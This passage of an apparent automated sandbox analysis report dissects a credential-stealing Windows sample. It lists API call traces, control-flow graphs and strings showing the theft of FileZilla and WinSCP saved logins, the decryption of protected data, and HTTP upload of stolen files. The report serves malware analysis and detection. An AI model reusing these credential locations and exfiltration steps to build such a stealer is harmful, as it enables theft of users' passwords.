                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2068576380-0
                                                                                                                                                                                                                                                                  • Opcode ID: 7766a09ae02c5c9894fe1c26561afbcd3650c2ee5faadd77ff71da6c8d7620c5
                                                                                                                                                                                                                                                                  • Instruction ID: b6664e9e9f56681aa501ea040db9ab26a5262009f8119dae2ea21babf9e93aaa
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7766a09ae02c5c9894fe1c26561afbcd3650c2ee5faadd77ff71da6c8d7620c5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E8011D7AA00208EFDB10DFE8DC448DEBBF9FF49740B100466FA01E7254D67599908B50
                                                                                                                                                                                                                                                                  Function 0040FC12 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0041736F,004265B7), ref: 0040FC1E
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,0041736F,004265B7), ref: 0040FC25
                                                                                                                                                                                                                                                                  • GetUserNameA.ADVAPI32(00000000,?), ref: 0040FC39
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Heap$AllocNameProcessUser
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1206570057-0
                                                                                                                                                                                                                                                                  • Opcode ID: 669fae420ee6eb1cdbbca0cf155bea1fe1a262ab4713cf9ebff3bc65d35779fa
                                                                                                                                                                                                                                                                  • Instruction ID: 717baa134c2685402ab052e767e48c87ea90d479ce835390d18d57d128390497
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 669fae420ee6eb1cdbbca0cf155bea1fe1a262ab4713cf9ebff3bc65d35779fa
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90D05EB6700204FBE7109BA5DE0DE9BBBBCEB84755F400166FB02D2290DAF09A05CA34
                                                                                                                                                                                                                                                                  Function 0040FEC8 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InfoSystemwsprintf
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2452939696-0
                                                                                                                                                                                                                                                                  • Opcode ID: ad8192bee85099b4f1d2d7c93e4f679d4160f6340997857b508107d9f7abfafd
                                                                                                                                                                                                                                                                  • Instruction ID: d90b96cd58d26230f641ba286d2ae1708d289da70e3670108324555c20260de2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ad8192bee85099b4f1d2d7c93e4f679d4160f6340997857b508107d9f7abfafd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DCD05B7590011DD7CF10EB90FC499C9777CAB04208F4001A19700F2050E775D65D8BD5
                                                                                                                                                                                                                                                                  Function 004043D6 Relevance: 74.3, APIs: 26, Strings: 16, Instructions: 771stringnetworkmemoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 29 4043d6-4044d5 _EH_prolog call 40f9a1 call 403a7d call 410d92 call 40fb94 lstrlenA call 40fb94 call 410d92 call 40f96a * 5 StrCmpCA 52 4044d7 29->52 53 4044d8-4044dd 29->53 52->53 54 4044fd-40461d call 410b42 call 40fa6f call 40fa28 call 40f9d5 * 2 call 40fae3 call 40fa6f call 40fae3 call 40fa28 call 40f9d5 * 3 call 40fae3 call 40fa6f call 40fa28 call 40f9d5 * 2 InternetConnectA 53->54 55 4044df-4044f7 call 40fb94 InternetOpenA 53->55 60 404d30-404d6d call 410a7a * 2 call 40fb5b * 4 call 40f9a1 54->60 124 404623-404656 HttpOpenRequestA 54->124 55->54 55->60 89 404d72-404df5 call 40f9d5 * 9 60->89 126 404d27-404d2a InternetCloseHandle 124->126 127 40465c-40465e 124->127 126->60 128 404660-404670 InternetSetOptionA 127->128 129 404676-404c7d call 40fae3 call 40fa28 call 40f9d5 call 40fa6f call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fa6f call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fa6f call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 402107 call 40fa6f call 40fa28 call 40f9d5 * 2 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fa6f call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fa6f call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fb94 lstrlenA call 40fb94 lstrlenA GetProcessHeap HeapAlloc call 40fb94 lstrlenA call 40fb94 memcpy call 40fb94 lstrlenA memcpy call 40fb94 lstrlenA call 40fb94 * 2 lstrlenA memcpy call 40fb94 lstrlenA call 40fb94 HttpSendRequestA call 410a7a HttpQueryInfoA 127->129 128->129 336 404c91-404ca3 call 410a5d 129->336 337 404c7f-404c8c call 40f96a 129->337 342 404df6-404e03 call 40f96a 336->342 343 404ca9-404cae 336->343 337->89 342->89 345 404cea-404cff InternetReadFile 343->345 346 404cb0-404cb5 345->346 347 404d01-404d17 call 40fb94 StrCmpCA 345->347 346->347 350 404cb7-404ce5 call 40fae3 call 40fa28 call 40f9d5 346->350 353 404d20-404d21 InternetCloseHandle 347->353 354 404d19-404d1a ExitProcess 347->354 350->345 353->126
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 004043DB
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: _EH_prolog.MSVCRT ref: 00403A82
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: ??_U@YAPAXI@Z.MSVCRT ref: 00403AB4
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: ??_U@YAPAXI@Z.MSVCRT ref: 00403ABD
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: ??_U@YAPAXI@Z.MSVCRT ref: 00403AC6
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AE0
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AF0
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040444A
                                                                                                                                                                                                                                                                    • Part of subcall function 00410D92: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00410DB6
                                                                                                                                                                                                                                                                    • Part of subcall function 00410D92: GetProcessHeap.KERNEL32(00000000,?,?,0040443E,?,?,?,?,?,?), ref: 00410DC3
                                                                                                                                                                                                                                                                    • Part of subcall function 00410D92: RtlAllocateHeap.NTDLL(00000000,?,0040443E,?,?,?,?,?,?), ref: 00410DCA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,004259DF,004259DB,004259D3,004259CF,004259CE), ref: 004044CD
                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004044ED
                                                                                                                                                                                                                                                                  • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404612
                                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 0040464C
                                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404670
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,file_data,00000000,?,00000000,?,00425A98,00000000,?,?,00000000), ref: 00404B80
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00404B92
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404BA4
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00404BAB
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00404BBD
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 00404BD0
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?), ref: 00404BE7
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 00404BF1
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00404C02
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404C1B
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 00404C28
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,00000000), ref: 00404C3D
                                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404C4E
                                                                                                                                                                                                                                                                  • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00404C75
                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404CF7
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,block), ref: 00404D0F
                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00404D1A
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00404D2A
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrlen$Internet$lstrcpy$H_prologHeap$HttpProcessmemcpy$OpenRequestlstrcat$AllocAllocateBinaryCloseConnectCrackCryptExitFileHandleInfoOptionQueryReadSendString
                                                                                                                                                                                                                                                                  • String ID: ------$"$"$"$"$--$------$------$------$------$0$ERROR$ERROR$block$build_id$file_data
                                                                                                                                                                                                                                                                  • API String ID: 1779273220-3618031631
                                                                                                                                                                                                                                                                  • Opcode ID: 651a7999f55e767fe530401ec891db1040495a77fe0f17f926df5f218a8a1342
                                                                                                                                                                                                                                                                  • Instruction ID: bb81c6569726edad2be1ce66366f39dabb39e00b3ca7f300d206800e22a2ed41
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 651a7999f55e767fe530401ec891db1040495a77fe0f17f926df5f218a8a1342
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C625F71900249EADF11EBE4C956AEEBBB8AF15308F14407EE106735C2EB785B4CCB65
                                                                                                                                                                                                                                                                  Function 0040BC3C Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 370stringmemoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 359 40bc3c-40bcfb _EH_prolog call 40f96a call 410d07 call 40fa6f call 40fa28 call 40f9d5 * 2 call 40fae3 call 40fa28 call 40f9d5 call 40f9a1 call 4061de 382 40bd01-40bd10 call 410d53 359->382 383 40c118-40c13c call 40f9d5 call 401061 359->383 382->383 389 40bd16-40bd83 strtok_s call 40f96a * 4 GetProcessHeap HeapAlloc 382->389 399 40c062-40c064 389->399 400 40bd88-40bd96 StrStrA 399->400 401 40c06a-40c113 lstrlenA call 40f96a call 4010b1 call 414519 call 40f9d5 memset call 40fb5b * 4 call 40f9d5 * 4 399->401 402 40bd98-40bdc6 lstrlenA call 41113a call 40fa28 call 40f9d5 400->402 403 40bdcb-40bdd9 StrStrA 400->403 401->383 402->403 407 40be14-40be22 StrStrA 403->407 408 40bddb-40be0f lstrlenA call 41113a call 40fa28 call 40f9d5 403->408 412 40be24-40be58 lstrlenA call 41113a call 40fa28 call 40f9d5 407->412 413 40be5d-40be6b StrStrA 407->413 408->407 412->413 416 40be71-40bebf lstrlenA call 41113a call 40fa28 call 40f9d5 call 40fb94 call 406295 413->416 417 40bef6-40bf0a call 40fb94 lstrlenA 413->417 416->417 460 40bec1-40bef1 call 40f9de call 40fae3 call 40fa28 call 40f9d5 416->460 435 40bf10-40bf21 call 40fb94 lstrlenA 417->435 436 40c04f-40c060 strtok_s 417->436 435->436 447 40bf27-40bf38 call 40fb94 lstrlenA 435->447 436->399 447->436 454 40bf3e-40bf4f call 40fb94 lstrlenA 447->454 454->436 464 40bf55-40c04a lstrcat * 2 call 40fb94 lstrcat * 2 call 40fb94 lstrcat * 3 call 40fb94 lstrcat * 3 call 40fb94 lstrcat * 3 call 40f9de * 4 454->464 460->417 464->436
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040BC41
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 00410D07: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D38
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: _EH_prolog.MSVCRT ref: 004061E3
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406206
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040621D
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406239
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406253
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406274
                                                                                                                                                                                                                                                                    • Part of subcall function 00410D53: LocalAlloc.KERNEL32(00000040,004131C1,000000C8,00000001,?,004131C0,00000000,00000000), ref: 00410D6C
                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 0040BD1F
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00425C9B,00425C9A,00425C97,00425C96), ref: 0040BD73
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0040BD7A
                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040BD8E
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040BD99
                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040BDD1
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040BDDC
                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 0040BE1A
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040BE25
                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040BE63
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040BE72
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 0040C06D
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: _EH_prolog.MSVCRT ref: 0041451E
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: CreateThread.KERNEL32(00000000,00000000,0041331B,?,00000000,00000000), ref: 004145C4
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004145CC
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040C0C0
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prologlstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitmemsetstrtok_s
                                                                                                                                                                                                                                                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                                                                                                                                                                                                                  • API String ID: 486015307-935134978
                                                                                                                                                                                                                                                                  • Opcode ID: 999931abf7304cef73ef8fafb512a87fc1f4c510844512cada0e42a3ba9c6671
                                                                                                                                                                                                                                                                  • Instruction ID: b5aa30454ba26c693b1c0b311e96de347820eaac3236cfe29466d7d55c9fcea2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 999931abf7304cef73ef8fafb512a87fc1f4c510844512cada0e42a3ba9c6671
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2DE16C71D00258EADB11EBE5DC46EEEBB78AF15304F50447AF506B21D2EF381A48CB69
                                                                                                                                                                                                                                                                  Function 0040E7FF Relevance: 63.4, APIs: 22, Strings: 14, Instructions: 411registryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040E804
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040E82D
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040E84D
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040E861
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040E875
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040E884
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040E892
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040E8A3
                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0040E8CB
                                                                                                                                                                                                                                                                  • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E8F3
                                                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?), ref: 0040E93A
                                                                                                                                                                                                                                                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040E957
                                                                                                                                                                                                                                                                  • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,00000000,?,Host: ,00000000,?,Soft: WinSCP,00425C8F), ref: 0040E9E9
                                                                                                                                                                                                                                                                  • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,00000000,?,?), ref: 0040EA3B
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
